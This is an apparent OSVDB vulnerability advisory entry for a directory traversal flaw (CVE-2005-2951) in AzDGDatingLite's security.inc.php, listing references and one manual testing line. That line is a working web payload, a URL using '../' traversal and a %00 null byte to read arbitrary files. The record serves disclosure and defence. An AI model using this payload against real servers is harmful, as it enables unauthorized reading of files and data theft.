AzDGDatingLite security.inc.php Traversal Arbitrary File Access

2005-09-13T08:09:11
ID OSVDB:19410
Type osvdb
Reporter OSVDB
Modified 2005-09-13T08:09:11

Description

Manual Testing Notes

http://[target]/[path]/azdg//include/security.inc.php?l=../../../../../../../[filename.ext]%00

References:

Vendor URL: http://www.azdg.com/ Security Tracker: 1014907 Secunia Advisory ID:16814 Other Advisory URL: http://rgod.altervista.org/azdg.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-09/0128.html ISS X-Force ID: 22258 CVE-2005-2951 Bugtraq ID: 14819